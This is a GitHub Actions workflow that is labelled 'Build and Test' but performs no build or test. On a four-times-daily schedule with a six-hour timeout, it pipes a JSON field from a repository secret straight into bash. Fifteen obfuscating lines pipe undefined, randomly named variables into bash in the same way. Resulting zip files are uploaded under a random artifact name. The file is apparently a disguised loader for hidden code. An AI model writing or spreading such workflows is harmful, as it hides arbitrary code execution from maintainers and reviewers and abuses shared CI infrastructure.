name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '22 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          uktnq744: ${{ secrets.uktnq744 }}
        run: |
          printf '%s' "$uktnq744" | jq -r .pzzk7 | /bin/bash
          printf '%s' "$sausi653" | jq -r .z65195 | /bin/bash
          echo $yjq66 | jq -r .jorkk07 | /bin/bash
          printf '%s' "$c10" | jq -r .ge2 | /bin/bash
          printf '%s' "$k3878" | jq -r .x6508 | /bin/bash
          printf '%s' "$i24984" | jq -r .pkb7429 | /bin/bash
          echo $edd14 | jq -r .cq58389 | /bin/bash
          printf '%s' "$dlzs6970" | jq -r .irsy36 | /bin/bash
          printf '%s' "$sohcu7" | jq -r .zg09 | /bin/bash
          echo $am5882 | jq -r .wvqaz7126 | /bin/bash
          echo $cxgf7 | jq -r .nbcj588 | /bin/bash
          printf '%s' "$otn0899" | jq -r .su088 | /bin/bash
          echo $xa3954 | jq -r .q48 | /bin/bash
          echo $xwt443 | jq -r .my736 | /bin/bash
          printf '%s' "$yhrtg596" | jq -r .zg84813 | /bin/bash
          echo $yrr7694 | jq -r .k743 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 8CdKXCuC
          path: "*.zip"
          retention-days: 1
